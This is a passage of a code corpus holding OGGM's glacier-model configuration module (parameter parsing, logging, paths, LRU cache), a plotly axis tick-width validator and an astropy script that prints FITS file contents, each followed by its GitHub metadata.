raise ValueError('Cannot overwrite a key.')
dict.__setitem__(self, key, value)
self._doc[key] = docstr
def __setitem__(self, key, value):
# Overrides the original dic to separate value and documentation
global CONFIG_MODIFIED
try:
self._set_key(key, value[0], docstr=value[1])
CONFIG_MODIFIED = True
except BaseException:
raise ValueError('DocumentedDict accepts only tuple of len 2')
def info_str(self, key):
"""Info string for the documentation."""
return ' {}'.format(self[key]) + '\n' + ' ' + self._doc[key]
def doc_str(self, key):
"""Info string for the documentation."""
return ' {}'.format(self[key]) + '\n' + ' ' + \
self._doc[key]
class ResettingOrderedDict(OrderedDict):
"""OrderedDict wrapper that resets our multiprocessing on set"""
def __setitem__(self, key, value):
global CONFIG_MODIFIED
OrderedDict.__setitem__(self, key, value)
CONFIG_MODIFIED = True
class PathOrderedDict(ResettingOrderedDict):
"""Quick "magic" to be sure that paths are expanded correctly."""
def __setitem__(self, key, value):
# Overrides the original dic to expand the path
try:
value = os.path.expanduser(value)
except AttributeError:
raise InvalidParamsError('The value you are trying to set does '
'not seem to be a valid path: '
'{}'.format(value))
ResettingOrderedDict.__setitem__(self, key, value)
class ParamsLoggingDict(ResettingOrderedDict):
"""Quick "magic" to log the parameter changes by the user."""
do_log = False
def __setitem__(self, key, value):
# Overrides the original dic to log the change
if self.do_log:
self._log_param_change(key, value)
ResettingOrderedDict.__setitem__(self, key, value)
def _log_param_change(self, key, value):
prev = self.get(key)
if prev is None:
if key in ['baseline_y0', 'baseline_y1']:
raise InvalidParamsError('The `baseline_y0` and `baseline_y1` '
'parameters have been removed. '
'You now have to set them explicitly '
'in your call to '
'`process_climate_data`.')
log.workflow('WARNING: adding an unknown parameter '
'`{}`:`{}` to PARAMS.'.format(key, value))
return
if prev == value:
return
if key == 'use_multiprocessing':
msg = 'ON' if value else 'OFF'
log.workflow('Multiprocessing switched {} '.format(msg) +
'after user settings.')
return
if key == 'mp_processes':
if value == -1:
import multiprocessing
value = multiprocessing.cpu_count()
if PARAMS.get('use_multiprocessing', False):
log.workflow('Multiprocessing: using all available '
'processors (N={})'.format(value))
else:
if PARAMS.get('use_multiprocessing', False):
log.workflow('Multiprocessing: using the requested number '
'of processors (N={})'.format(value))
return
log.workflow("PARAMS['{}'] changed from `{}` to `{}`.".format(key,
prev,
value))
# Globals
IS_INITIALIZED = False
PARAMS = ParamsLoggingDict()
PATHS = PathOrderedDict()
BASENAMES = DocumentedDict()
LRUHANDLERS = ResettingOrderedDict()
# Constants
SEC_IN_YEAR = 365*24*3600
SEC_IN_DAY = 24*3600
SEC_IN_HOUR = 3600
SEC_IN_MONTH = 2628000
DAYS_IN_MONTH = np.array([31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31])
G = 9.80665 # gravity
GAUSSIAN_KERNEL = dict()
for ks in [5, 7, 9]:
kernel = gaussian(ks, 1)
GAUSSIAN_KERNEL[ks] = kernel / kernel.sum()
_doc = ('A geotiff file containing the DEM (reprojected into the local grid).'
        'This DEM is not smoothed or gap-filled, and is the closest to the '
'original DEM source.')
BASENAMES['dem'] = ('dem.tif', _doc)
_doc = ('A glacier mask geotiff file with the same extent and projection as '
        'the `dem.tif`. This geotiff has value 1 at glaciated grid points '
        'and value 0 at unglaciated points.')
BASENAMES['glacier_mask'] = ('glacier_mask.tif', _doc)
_doc = ('The glacier outlines in the local map projection (Transverse '
'Mercator).')
BASENAMES['outlines'] = ('outlines.shp', _doc)
_doc = ('The glacier intersects in the local map projection (Transverse '
'Mercator).')
BASENAMES['intersects'] = ('intersects.shp', _doc)
_doc = ('Each flowline has a catchment area computed from flow routing '
'algorithms: this shapefile stores the catchment outlines (in the '
'local map projection (Transverse Mercator).')
BASENAMES['flowline_catchments'] = ('flowline_catchments.shp', _doc)
_doc = ('The intersections between catchments (shapefile) in the local map '
'projection (Transverse Mercator).')
BASENAMES['catchments_intersects'] = ('catchments_intersects.shp', _doc)
_doc = 'A ``salem.Grid`` handling the georeferencing of the local grid.'
BASENAMES['glacier_grid'] = ('glacier_grid.json', _doc)
_doc = 'A dictionary containing runtime diagnostics useful for debugging.'
BASENAMES['diagnostics'] = ('diagnostics.json', _doc)
_doc = ('A netcdf file containing several gridded data variables such as '
'topography, the glacier masks, the interpolated 2D glacier bed, '
'and more.')
BASENAMES['gridded_data'] = ('gridded_data.nc', _doc)
_doc = ('A dictionary containing the shapely.Polygons of a glacier. The '
'"polygon_hr" entry contains the geometry transformed to the local '
'grid in (i, j) coordinates, while the "polygon_pix" entry contains '
'the geometries transformed into the coarse grid (the i, j elements '
'are integers). The "polygon_area" entry contains the area of the '
'polygon as computed by Shapely. The "catchment_indices" entry'
'contains a list of len `n_centerlines`, each element containing '
'a numpy array of the indices in the glacier grid which represent '
'the centerlines catchment area.')
BASENAMES['geometries'] = ('geometries.pkl', _doc)
_doc = ('A dictionary containing the downstream line geometry as well as the '
'bed shape computed from a parabolic fit.')
BASENAMES['downstream_line'] = ('downstream_line.pkl', _doc)
_doc = 'A text file with the source of the topo file (GIMP, SRTM, ...).'
BASENAMES['dem_source'] = ('dem_source.txt', _doc)
_doc = ('A hypsometry file computed by OGGM and provided in the same format '
'as the RGI (useful for diagnostics).')
BASENAMES['hypsometry'] = ('hypsometry.csv', _doc)
_doc = 'A list of :py:class:`oggm.Centerline` instances, sorted by flow order.'
BASENAMES['centerlines'] = ('centerlines.pkl', _doc)
_doc = ('A "better" version of the Centerlines, now on a regular spacing '
'i.e., not on the gridded (i, j) indices. The tails of the '
'tributaries are cut out to make more realistic junctions. '
'They are now "1.5D" i.e., with a width.')
BASENAMES['inversion_flowlines'] = ('inversion_flowlines.pkl', _doc)
_doc = 'The historical monthly climate timeseries stored in a netCDF file.'
BASENAMES['climate_historical'] = ('climate_historical.nc', _doc)
# so far, this is only ERA5_daily and does not work with the default OGGM
# mass balance module
_doc = ('The historical daily climate timeseries stored in a netCDF file '
        '(only temperature really changes on a daily basis; '
        'precipitation is assumed constant for every day).')
BASENAMES['climate_historical_daily'] = ('climate_historical_daily.nc', _doc)
_doc = 'Deprecated: old name for `climate_historical`.'
BASENAMES['climate_monthly'] = ('climate_monthly.nc', _doc)
_doc = ('Some information (dictionary) about the mass '
'balance parameters for this glacier.')
BASENAMES['climate_info'] = ('climate_info.json', _doc)
_doc = 'The monthly GCM climate timeseries stored in a netCDF file.'
BASENAMES['gcm_data'] = ('gcm_data.nc', _doc)
_doc = "A dict containing the glacier's t*, bias, and the flowlines' mu*"
BASENAMES['local_mustar'] = ('local_mustar.json', _doc)
_doc = 'List of dicts containing the data needed for the inversion.'
BASENAMES['inversion_input'] = ('inversion_input.pkl', _doc)
_doc = 'List of dicts containing the output data from the inversion.'
BASENAMES['inversion_output'] = ('inversion_output.pkl', _doc)
_doc = 'List of flowlines ready to be run by the model.'
BASENAMES['model_flowlines'] = ('model_flowlines.pkl', _doc)
_doc = ('When using a linear mass balance for the inversion, this dict stores '
'the optimal ela_h and grad.')
BASENAMES['linear_mb_params'] = ('linear_mb_params.pkl', _doc)
_doc = 'Deprecated: renamed to `model_geometry`.'
BASENAMES['model_run'] = ('model_run.nc', _doc)
_doc = ('A netcdf file containing enough information to reconstruct the '
'entire flowline glacier geometry along the run (can be expensive'
'in disk space).')
BASENAMES['model_geometry'] = ('model_geometry.nc', _doc)
_doc = ('A netcdf file containing the model diagnostics (volume, '
'mass balance, length...).')
BASENAMES['model_diagnostics'] = ('model_diagnostics.nc', _doc)
_doc = ('A group netcdf file containing the model diagnostics (volume, '
'thickness, velocity...) along the flowlines (thus much heavier).'
'Netcdf groups = fl_{i}, with i between 0 and n_flowlines - 1')
BASENAMES['fl_diagnostics'] = ('fl_diagnostics.nc', _doc)
_doc = "A table containing the Huss&Farinotti 2012 squeezed flowlines."
BASENAMES['elevation_band_flowline'] = ('elevation_band_flowline.csv', _doc)
def set_logging_config(logging_level='INFO', future=False):
"""Set the global logger parameters.
Logging levels:
DEBUG
Print detailed information, typically of interest only when diagnosing
problems.
INFO
Print confirmation that things are working as expected, e.g. when
each task is run correctly (this is the default).
WARNING
Indication that something unexpected happened on a glacier,
but that OGGM is still working on this glacier.
ERROR
Print workflow messages and errors only, e.g. when a glacier cannot
run properly.
WORKFLOW
Print only high level, workflow information (typically, one message
per task). Errors and warnings will NOT be printed.
CRITICAL
Print nothing but fatal errors.
Parameters
----------
logging_level : str or None
the logging level. See description above for a list of options. Setting
to `None` is equivalent to `'CRITICAL'`, i.e. no log output will be
generated.
future : bool
use the new behavior of logging='WORKFLOW'.
"""
# Add a custom level - just for us
logging.addLevelName(45, 'WORKFLOW')
def workflow(self, message, *args, **kws):
"""Standard log message with a custom level."""
if self.isEnabledFor(45):
# Yes, logger takes its '*args' as 'args'.
self._log(45, message, args, **kws)
logging.WORKFLOW = 45
logging.Logger.workflow = workflow
# Remove all handlers associated with the root logger object.
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
# Spammers
logging.getLogger("Fiona").setLevel(logging.CRITICAL)
logging.getLogger("fiona").setLevel(logging.CRITICAL)
logging.getLogger("shapely").setLevel(logging.CRITICAL)
logging.getLogger("rasterio").setLevel(logging.CRITICAL)
logging.getLogger("matplotlib").setLevel(logging.CRITICAL)
logging.getLogger("numexpr").setLevel(logging.CRITICAL)
# Basic config
if logging_level is None:
logging_level = 'CRITICAL'
logging_level = logging_level.upper()
# Deprecation warning
if logging_level == 'WORKFLOW' and not future:
msg = ('In future versions of OGGM, the logging config WORKFLOW '
'will no longer print ERROR or WARNING messages, but only high '
'level information (i.e. hiding potential errors in your code '
'but also avoiding cluttered log files for runs with '
'many expected errors, e.g. global runs). If you want to obtain '
'a similar logger behavior as before, set '
"`logging_level='WARNING'`, which will print high level info "
"as well as errors and warnings during the run. If you "
"want to use the new behavior and suppress this warning, "
"set `logging_level='WORKFLOW'` and `future=True`.")
warnings.warn(msg, category=FutureWarning)
# Set old behavior
logging_level = 'WARNING'
logging.basicConfig(format='%(asctime)s: %(name)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=getattr(logging, logging_level))
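# Hedged usage sketch (not part of the original module): set_logging_config is
# called for you by initialize()/initialize_minimal(), but it can also be
# called directly, e.g.:
#
#     set_logging_config('CRITICAL')  # print nothing but fatal errors
#     set_logging_config('DEBUG')     # most detailed output for debugging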
def initialize_minimal(file=None, logging_level='INFO', params=None,
future=False):
"""Same as initialise() but without requiring any download of data.
This is useful for "flowline only" OGGM applications
Parameters
----------
file : str
path to the configuration file (default: OGGM params.cfg)
logging_level : str
set a logging level. See :func:`set_logging_config` for options.
params : dict
overrides for specific parameters from the config file
future : bool
use the new behavior of logging='WORKFLOW'.
"""
global IS_INITIALIZED
global PARAMS
global PATHS
set_logging_config(logging_level=logging_level, future=future)
is_default = False
if file is None:
file = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'params.cfg')
is_default = True
try:
cp = ConfigObj(file, file_error=True)
except (ConfigObjError, IOError) as e:
log.critical('Config file could not be parsed (%s): %s', file, e)
sys.exit()
if is_default:
log.workflow('Reading default parameters from the OGGM `params.cfg` '
'configuration file.')
else:
log.workflow('Reading parameters from the user provided '
'configuration file: %s', file)
# Static Paths
oggm_static_paths()
# Apply code-side manual params overrides
if params:
for k, v in params.items():
cp[k] = v
# Paths
PATHS['working_dir'] = cp['working_dir']
PATHS['dem_file'] = cp['dem_file']
PATHS['climate_file'] = cp['climate_file']
# Ephemeral paths overrides
env_wd = os.environ.get('OGGM_WORKDIR')
if env_wd and not PATHS['working_dir']:
PATHS['working_dir'] = env_wd
log.workflow("PATHS['working_dir'] set to env variable $OGGM_WORKDIR: "
+ env_wd)
# Do not spam
PARAMS.do_log = False
# Multiprocessing pool
try:
use_mp = bool(int(os.environ['OGGM_USE_MULTIPROCESSING']))
msg = 'ON' if use_mp else 'OFF'
log.workflow('Multiprocessing switched {} '.format(msg) +
'according to the ENV variable OGGM_USE_MULTIPROCESSING')
except KeyError:
use_mp = cp.as_bool('use_multiprocessing')
msg = 'ON' if use_mp else 'OFF'
log.workflow('Multiprocessing switched {} '.format(msg) +
'according to the parameter file.')
PARAMS['use_multiprocessing'] = use_mp
# Spawn
try:
use_mp_spawn = bool(int(os.environ['OGGM_USE_MP_SPAWN']))
msg = 'ON' if use_mp_spawn else 'OFF'
log.workflow('MP spawn context switched {} '.format(msg) +
'according to the ENV variable OGGM_USE_MP_SPAWN')
except KeyError:
use_mp_spawn = cp.as_bool('use_mp_spawn')
PARAMS['use_mp_spawn'] = use_mp_spawn
# Number of processes
mpp = cp.as_int('mp_processes')
if mpp == -1:
try:
mpp = int(os.environ['SLURM_JOB_CPUS_PER_NODE'])
log.workflow('Multiprocessing: using slurm allocated '
'processors (N={})'.format(mpp))
except (KeyError, ValueError):
import multiprocessing
mpp = multiprocessing.cpu_count()
log.workflow('Multiprocessing: using all available '
'processors (N={})'.format(mpp))
else:
log.workflow('Multiprocessing: using the requested number of '
'processors (N={})'.format(mpp))
PARAMS['mp_processes'] = mpp
# Size of LRU cache
try:
lru_maxsize = int(os.environ['LRU_MAXSIZE'])
log.workflow('Size of LRU cache set to {} '.format(lru_maxsize) +
'according to the ENV variable LRU_MAXSIZE')
except KeyError:
lru_maxsize = cp.as_int('lru_maxsize')
PARAMS['lru_maxsize'] = lru_maxsize
# Some non-trivial params
PARAMS['continue_on_error'] = cp.as_bool('continue_on_error')
PARAMS['grid_dx_method'] = cp['grid_dx_method']
PARAMS['topo_interp'] = cp['topo_interp']
PARAMS['use_intersects'] = cp.as_bool('use_intersects')
PARAMS['use_compression'] = cp.as_bool('use_compression')
PARAMS['border'] = cp.as_int('border')
PARAMS['mpi_recv_buf_size'] = cp.as_int('mpi_recv_buf_size')
PARAMS['use_multiple_flowlines'] = cp.as_bool('use_multiple_flowlines')
PARAMS['filter_min_slope'] = cp.as_bool('filter_min_slope')
PARAMS['auto_skip_task'] = cp.as_bool('auto_skip_task')
PARAMS['correct_for_neg_flux'] = cp.as_bool('correct_for_neg_flux')
PARAMS['filter_for_neg_flux'] = cp.as_bool('filter_for_neg_flux')
PARAMS['run_mb_calibration'] = cp.as_bool('run_mb_calibration')
PARAMS['rgi_version'] = cp['rgi_version']
PARAMS['use_rgi_area'] = cp.as_bool('use_rgi_area')
PARAMS['compress_climate_netcdf'] = cp.as_bool('compress_climate_netcdf')
PARAMS['use_tar_shapefiles'] = cp.as_bool('use_tar_shapefiles')
PARAMS['clip_mu_star'] = cp.as_bool('clip_mu_star')
PARAMS['clip_tidewater_border'] = cp.as_bool('clip_tidewater_border')
PARAMS['dl_verify'] = cp.as_bool('dl_verify')
PARAMS['calving_line_extension'] = cp.as_int('calving_line_extension')
PARAMS['use_kcalving_for_inversion'] = cp.as_bool('use_kcalving_for_inversion')
PARAMS['use_kcalving_for_run'] = cp.as_bool('use_kcalving_for_run')
PARAMS['calving_use_limiter'] = cp.as_bool('calving_use_limiter')
PARAMS['use_inversion_params_for_run'] = cp.as_bool('use_inversion_params_for_run')
k = 'error_when_glacier_reaches_boundaries'
PARAMS[k] = cp.as_bool(k)
PARAMS['store_model_geometry'] = cp.as_bool('store_model_geometry')
PARAMS['store_fl_diagnostics'] = cp.as_bool('store_fl_diagnostics')
# Climate
PARAMS['baseline_climate'] = cp['baseline_climate'].strip().upper()
PARAMS['hydro_month_nh'] = cp.as_int('hydro_month_nh')
PARAMS['hydro_month_sh'] = cp.as_int('hydro_month_sh')
PARAMS['climate_qc_months'] = cp.as_int('climate_qc_months')
PARAMS['temp_use_local_gradient'] = cp.as_bool('temp_use_local_gradient')
PARAMS['tstar_search_glacierwide'] = cp.as_bool('tstar_search_glacierwide')
PARAMS['geodetic_mb_period'] = cp['geodetic_mb_period']
PARAMS['use_winter_prcp_factor'] = cp.as_bool('use_winter_prcp_factor')
k = 'winter_prcp_factor_ab'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'winter_prcp_factor_range'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'temp_local_gradient_bounds'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'tstar_search_window'
PARAMS[k] = [int(vk) for vk in cp.as_list(k)]
k = 'ref_mb_valid_window'
PARAMS[k] = [int(vk) for vk in cp.as_list(k)]
PARAMS['use_bias_for_run'] = cp.as_bool('use_bias_for_run')
k = 'free_board_marine_terminating'
PARAMS[k] = [float(vk) for vk in cp.as_list(k)]
k = 'store_diagnostic_variables'
PARAMS[k] = [str(vk) for vk in cp.as_list(k)]
k = 'store_fl_diagnostic_variables'
PARAMS[k] = [str(vk) for vk in cp.as_list(k)]
# Inversion
k = 'use_shape_factor_for_inversion'
PARAMS[k] = cp[k]
# Flowline model
k = 'use_shape_factor_for_fluxbasedmodel'
PARAMS[k] = cp[k]
k = 'glacier_length_method'
PARAMS[k] = cp[k]
# Others
PARAMS['tidewater_type'] = cp.as_int('tidewater_type')
# Precip factor can be none
try:
PARAMS['prcp_scaling_factor'] = cp.as_float('prcp_scaling_factor')
except ValueError:
PARAMS['prcp_scaling_factor'] = None
# Delete non-floats
ltr = ['working_dir', 'dem_file', 'climate_file', 'use_tar_shapefiles',
'grid_dx_method', 'run_mb_calibration', 'compress_climate_netcdf',
'mp_processes', 'use_multiprocessing', 'climate_qc_months',
'temp_use_local_gradient', 'temp_local_gradient_bounds',
'topo_interp', 'use_compression', 'bed_shape', 'continue_on_error',
'use_multiple_flowlines', 'tstar_search_glacierwide', 'border',
'mpi_recv_buf_size', 'hydro_month_nh', 'clip_mu_star',
'tstar_search_window', 'use_bias_for_run', 'hydro_month_sh',
'use_intersects', 'filter_min_slope', 'clip_tidewater_border',
'auto_skip_task', 'correct_for_neg_flux', 'filter_for_neg_flux',
'rgi_version', 'dl_verify', 'use_mp_spawn', 'calving_use_limiter',
'use_shape_factor_for_inversion', 'use_rgi_area',
'use_shape_factor_for_fluxbasedmodel', 'baseline_climate',
'calving_line_extension', 'use_kcalving_for_run', 'lru_maxsize',
'free_board_marine_terminating', 'use_kcalving_for_inversion',
'error_when_glacier_reaches_boundaries', 'glacier_length_method',
'use_inversion_params_for_run', 'ref_mb_valid_window',
'tidewater_type', 'store_model_geometry', 'use_winter_prcp_factor',
'store_diagnostic_variables', 'store_fl_diagnostic_variables',
'geodetic_mb_period', 'store_fl_diagnostics', 'winter_prcp_factor_ab',
'winter_prcp_factor_range', 'prcp_scaling_factor']
for k in ltr:
cp.pop(k, None)
# Other params are floats
for k in cp:
PARAMS[k] = cp.as_float(k)
PARAMS.do_log = True
# Empty defaults
set_intersects_db()
IS_INITIALIZED = True
def initialize(file=None, logging_level='INFO', params=None, future=False):
"""Read the configuration file containing the run's parameters.
This should be the first call, before using any of the other OGGM modules
for most (all?) OGGM simulations.
Parameters
----------
file : str
path to the configuration file (default: OGGM params.cfg)
logging_level : str
set a logging level. See :func:`set_logging_config` for options.
params : dict
overrides for specific parameters from the config file
future : bool
use the new behavior of logging='WORKFLOW'.
"""
global PARAMS
global DATA
initialize_minimal(file=file, logging_level=logging_level, params=params,
future=future)
# Do not spam
PARAMS.do_log = False
# Make sure we have a proper cache dir
from oggm.utils import download_oggm_files, get_demo_file
download_oggm_files()
# Read in the demo glaciers
file = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'data', 'demo_glaciers.csv')
DATA['demo_glaciers'] = pd.read_csv(file, index_col=0)
# Add other things
if 'dem_grids' not in DATA:
grids = {}
for grid_json in ['gimpdem_90m_v01.1.json',
'arcticdem_mosaic_100m_v3.0.json',
'Alaska_albers_V3.json',
'AntarcticDEM_wgs84.json',
'REMA_100m_dem.json']:
if grid_json not in grids:
fp = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'data', grid_json)
try:
grids[grid_json] = salem.Grid.from_json(fp)
except NameError:
pass
DATA['dem_grids'] = grids
# Trigger a one time check of the hash file
from oggm.utils import get_dl_verify_data
get_dl_verify_data('dummy_section')
# OK
PARAMS.do_log = True
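# Hedged usage sketch (not part of the original module): the typical first
# lines of an OGGM run script (the working directory path is made up):
#
#     import oggm.cfg as cfg
#     cfg.initialize(logging_level='WORKFLOW', future=True)
#     cfg.PATHS['working_dir'] = '/path/to/my/run'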
def oggm_static_paths():
"""Initialise the OGGM paths from the config file."""
global PATHS, PARAMS
# See if the file is there, if not create it
if not os.path.exists(CONFIG_FILE):
dldir = os.path.join(os.path.expanduser('~'), 'OGGM')
config = ConfigObj()
config['dl_cache_dir'] = os.path.join(dldir, 'download_cache')
config['dl_cache_readonly'] = False
config['tmp_dir'] = os.path.join(dldir, 'tmp')
config['rgi_dir'] = os.path.join(dldir, 'rgi')
config['test_dir'] = os.path.join(dldir, 'tests')
config['has_internet'] = True
config.filename = CONFIG_FILE
config.write()
# OK, read in the file
try:
config = ConfigObj(CONFIG_FILE, file_error=True)
except (ConfigObjError, IOError) as e:
log.critical('Config file could not be parsed (%s): %s',
CONFIG_FILE, e)
sys.exit()
# Check that all keys are here
for k in ['dl_cache_dir', 'dl_cache_readonly', 'tmp_dir',
'rgi_dir', 'test_dir', 'has_internet']:
if k not in config:
raise InvalidParamsError('The oggm config file ({}) should have '
'an entry for {}.'.format(CONFIG_FILE, k))
# Override defaults with env variables if available
if os.environ.get('OGGM_DOWNLOAD_CACHE_RO') is not None:
ro = bool(strtobool(os.environ.get('OGGM_DOWNLOAD_CACHE_RO')))
config['dl_cache_readonly'] = ro
if os.environ.get('OGGM_DOWNLOAD_CACHE') is not None:
config['dl_cache_dir'] = os.environ.get('OGGM_DOWNLOAD_CACHE')
if os.environ.get('OGGM_EXTRACT_DIR') is not None:
# This is for the directories where OGGM needs to extract things
# On the cluster it might be useful to do it on a fast disc
edir = os.path.abspath(os.environ.get('OGGM_EXTRACT_DIR'))
config['tmp_dir'] = os.path.join(edir, 'tmp')
config['rgi_dir'] = os.path.join(edir, 'rgi')
# Fill the PATH dict
for k, v in config.iteritems():
if not k.endswith('_dir'):
continue
PATHS[k] = os.path.abspath(os.path.expanduser(v))
# Other
PARAMS.do_log = False
PARAMS['has_internet'] = config.as_bool('has_internet')
PARAMS['dl_cache_readonly'] = config.as_bool('dl_cache_readonly')
PARAMS.do_log = True
# Create cache dir if possible
if not os.path.exists(PATHS['dl_cache_dir']):
if not PARAMS['dl_cache_readonly']:
os.makedirs(PATHS['dl_cache_dir'])
# Always call this one!
oggm_static_paths()
def get_lru_handler(tmpdir=None, maxsize=None, ending='.tif'):
"""LRU handler for a given temporary directory (singleton).
Parameters
----------
tmpdir : str
path to the temporary directory to handle. Default is
``cfg.PATHS['tmp_dir']``.
maxsize : int
the max number of files to keep in the directory
ending : str
consider only the files with a certain ending
"""
global LRUHANDLERS
# see if we're set up
if tmpdir is None:
tmpdir = PATHS['tmp_dir']
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
# one handler per directory and file ending
# (in practice not very useful, but a dict is easier to handle)
k = (tmpdir, ending)
if k in LRUHANDLERS:
# was already there
lru = LRUHANDLERS[k]
# possibility to increase or decrease the cachesize if need be
if maxsize is not None:
lru.maxsize = maxsize
lru.purge()
return lru
else:
# we do a new one
from oggm.utils import LRUFileCache
# the files already present have to be counted, too
l0 = list(glob.glob(os.path.join(tmpdir, '*' + ending)))
l0.sort(key=os.path.getctime)
lru = LRUFileCache(l0, maxsize=maxsize)
LRUHANDLERS[k] = lru
return lru
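# Illustrative sketch, not part of the original module: get the handler for
# the default tmp dir and cap it at a hypothetical 50 '.tif' files; the
# handler then keeps at most that many matching files in the directory.
def _example_lru_handler_sketch():
    lru = get_lru_handler(maxsize=50, ending='.tif')
    return lru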
def set_intersects_db(path_or_gdf=None):
"""Set the glacier intersection database for OGGM to use.
It is now set automatically by the
:func:`oggm.workflow.init_glacier_directories` task, but setting it
manually can be useful for a slightly faster run initialization.
See :func:`oggm.utils.get_rgi_intersects_region_file` for how to obtain
such data.
Parameters
----------
    path_or_gdf : str or geopandas.GeoDataFrame
the intersects file to use
"""
global PARAMS
PARAMS.do_log = False
if PARAMS['use_intersects'] and path_or_gdf is not None:
if isinstance(path_or_gdf, str):
PARAMS['intersects_gdf'] = gpd.read_file(path_or_gdf)
else:
PARAMS['intersects_gdf'] = path_or_gdf
else:
PARAMS['intersects_gdf'] = pd.DataFrame()
PARAMS.do_log = True
def reset_working_dir():
"""Deletes the content of the working directory. Careful: cannot be undone!
"""
if PATHS['working_dir']:
if os.path.exists(PATHS['working_dir']):
shutil.rmtree(PATHS['working_dir'])
os.makedirs(PATHS['working_dir'])
def pack_config():
"""Pack the entire configuration in one pickleable dict."""
return {
'IS_INITIALIZED': IS_INITIALIZED,
'PARAMS': PARAMS,
'PATHS': PATHS,
'LRUHANDLERS': LRUHANDLERS,
'DATA': DATA,
'BASENAMES': dict(BASENAMES),
'DL_VERIFIED': DL_VERIFIED,
'DEM_SOURCE_TABLE': DEM_SOURCE_TABLE
}
def unpack_config(cfg_dict):
"""Unpack and apply the config packed via pack_config."""
global IS_INITIALIZED, PARAMS, PATHS, BASENAMES, LRUHANDLERS, DATA
global DL_VERIFIED, DEM_SOURCE_TABLE
IS_INITIALIZED = cfg_dict['IS_INITIALIZED']
PARAMS = cfg_dict['PARAMS']
PATHS = cfg_dict['PATHS']
LRUHANDLERS = cfg_dict['LRUHANDLERS']
DATA = cfg_dict['DATA']
DL_VERIFIED = cfg_dict['DL_VERIFIED']
DEM_SOURCE_TABLE = cfg_dict['DEM_SOURCE_TABLE']
# BASENAMES is a DocumentedDict, which cannot be pickled because
# set intentionally mismatches with get
BASENAMES = DocumentedDict()
for k in cfg_dict['BASENAMES']:
BASENAMES[k] = (cfg_dict['BASENAMES'][k], 'Imported Pickle')
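# Illustrative sketch, not part of the original module: ship the current
# configuration to a worker process and restore it there with the two
# helpers defined above.
def _example_config_roundtrip_sketch():
    cfg_dict = pack_config()
    # ... send cfg_dict to the worker (it is picklable) ...
    unpack_config(cfg_dict)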
def set_manager(manager):
"""Sets a multiprocessing manager to use for shared dicts"""
global DL_VERIFIED, DEM_SOURCE_TABLE, DATA
if manager:
new_dict = manager.dict()
new_dict.update(DL_VERIFIED)
DL_VERIFIED = new_dict
new_dict = manager.dict()
new_dict.update(DEM_SOURCE_TABLE)
DEM_SOURCE_TABLE = new_dict
new_dict = manager.dict()
new_dict.update(DATA)
DATA = new_dict
else:
DL_VERIFIED = dict(DL_VERIFIED)
DEM_SOURCE_TABLE = dict(DEM_SOURCE_TABLE)
DATA = dict(DATA)
def add_to_basenames(basename, filename, docstr=''):
"""Add an entry to the list of BASENAMES.
BASENAMES are access keys to files available at the gdir level.
Parameters
----------
basename : str
the key (e.g. 'dem', 'model_flowlines')
filename : str
the associated filename (e.g. 'dem.tif', 'model_flowlines.pkl')
docstr : str
the associated docstring (for documentation)
"""
global BASENAMES
if '.' not in filename:
raise ValueError('The filename needs a proper file suffix!')
BASENAMES[basename] = (filename, docstr)
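# Illustrative sketch, not part of the original module: register a
# hypothetical per-glacier file under a new basename.
def _example_add_basename_sketch():
    add_to_basenames('my_diagnostics', 'my_diagnostics.nc',
                     docstr='Hypothetical per-glacier diagnostics file.')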
| {
"content_hash": "a2ebb53659650ad808da92bda536fec7",
"timestamp": "",
"source": "github",
"line_count": 907,
"max_line_length": 87,
"avg_line_length": 37.187431091510476,
"alnum_prop": 0.6201784814254796,
"repo_name": "bearecinos/oggm",
"id": "a589f28ff3fd73667f2ea323f550101b5957cff8",
"size": "33729",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oggm/cfg.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "384"
},
{
"name": "Python",
"bytes": "1852706"
},
{
"name": "Shell",
"bytes": "1201"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class TickwidthValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="tickwidth", parent_name="layout.scene.zaxis", **kwargs
):
super(TickwidthValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "style"),
**kwargs
)
| {
"content_hash": "cfc5cb7a6b9423ea8a4b5aba247981f4",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 81,
"avg_line_length": 34.06666666666667,
"alnum_prop": 0.5870841487279843,
"repo_name": "plotly/python-api",
"id": "78f0faff0d705d2f4e095f8e490a0781d14a0d62",
"size": "511",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/layout/scene/zaxis/_tickwidth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
import argparse
from astropy.io import fits
# PARSE OPTIONS ###############################################################
parser = argparse.ArgumentParser(description="An astropy snippet")
parser.add_argument("filearg", nargs=1, metavar="FILE", help="the FITS file to process")
args = parser.parse_args()
file_path = args.filearg[0]
# PRINT GENERAL HDU INFOS #####################################################
print()
print(80 * '*')
print()
fits.info(file_path)
print()
print(80 * '*')
print()
# READ DATA ###################################################################
# Open the FITS file
hdu_list = fits.open(file_path)
# For each blocks
for hdu_index, hdu in enumerate(hdu_list):
print("HDU {}".format(hdu_index), 40 * '*')
print()
# Print header
print("* HEADERS")
print()
header = hdu.header
for key, value in header.items():
print(key, ":", value)
print()
# Print columns
if not hdu.is_image:
print("* COLUMNS")
print()
columns = hdu.columns
print(columns)
print()
print(columns.names)
print()
columns.info()
print()
# Print data
print("* DATA")
print()
data = hdu.data # "hdu.data" is a Numpy Array
print(data)
print()
# Close the FITS file
hdu_list.close()
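# Illustrative sketch, not part of the original snippet: pull a single column
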